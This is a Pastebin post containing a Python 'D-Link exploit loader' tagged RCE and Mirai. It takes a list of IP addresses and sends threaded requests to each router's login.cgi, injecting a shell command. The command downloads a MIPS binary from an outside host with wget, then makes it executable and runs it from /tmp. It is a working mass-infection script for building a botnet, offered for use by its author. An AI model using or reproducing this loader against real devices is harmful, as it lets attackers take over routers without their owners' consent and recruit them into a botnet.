xB4ckdoorREAL

[DLINK EXPLOIT LOADER] [RCE] [MIRAI]

Jan 9th, 2020
652
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.03 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # Dlink Exploit loader made by B4CKDOOR #
  4. # B4CKDOORARCHIVE.CLUB - https://discord.gg/MVktpTW #
  5.  
  6.  
  7. import threading, random, socket, time, sys, requests, re, os
  8. from threading import Thread
  9. from time import sleep
  10. import requests
  11. from requests.auth import HTTPDigestAuth
  12. from decimal import *
  13.  
  14. if len(sys.argv) < 2:
  15.     print "\033[37mUsage: python "+sys.argv[0]+" <list>\033[37m"
  16.     sys.exit()
  17.  
  18. vulns = open(sys.argv[1], "r").readlines()
  19.  
  20. class send_payload(threading.Thread):
  21.     def __init__ (self, ip):
  22.         threading.Thread.__init__(self)
  23.         self.ip = str(ip).rstrip('\n')
  24.     def run(self):
  25.         try:
  26.             url = "http://" + self.ip + "/login.cgi?cli=aa aa';wget http://1.3.3.7/Ares.mips -O -> /tmp/ff6;chmod  x /tmp/ff6;sh /tmp/ff6'$"
  27.             requests.get(url, timeout=3)
  28.             print "[DLINK] Loading: %s"%(self.ip)
  29.         except:
  30.             pass
  31.  
  32. for IP in vulns:
  33.     try:
  34.         ip = "".join(IP)
  35.         ip = ip.replace("\n", "")
  36.         t = send_payload(ip)
  37.         t.start()
  38.         time.sleep(0.03)
  39.     except:
  40.         pass #CODED BY B4CKDOOR
Add Comment
Please, Sign In to add comment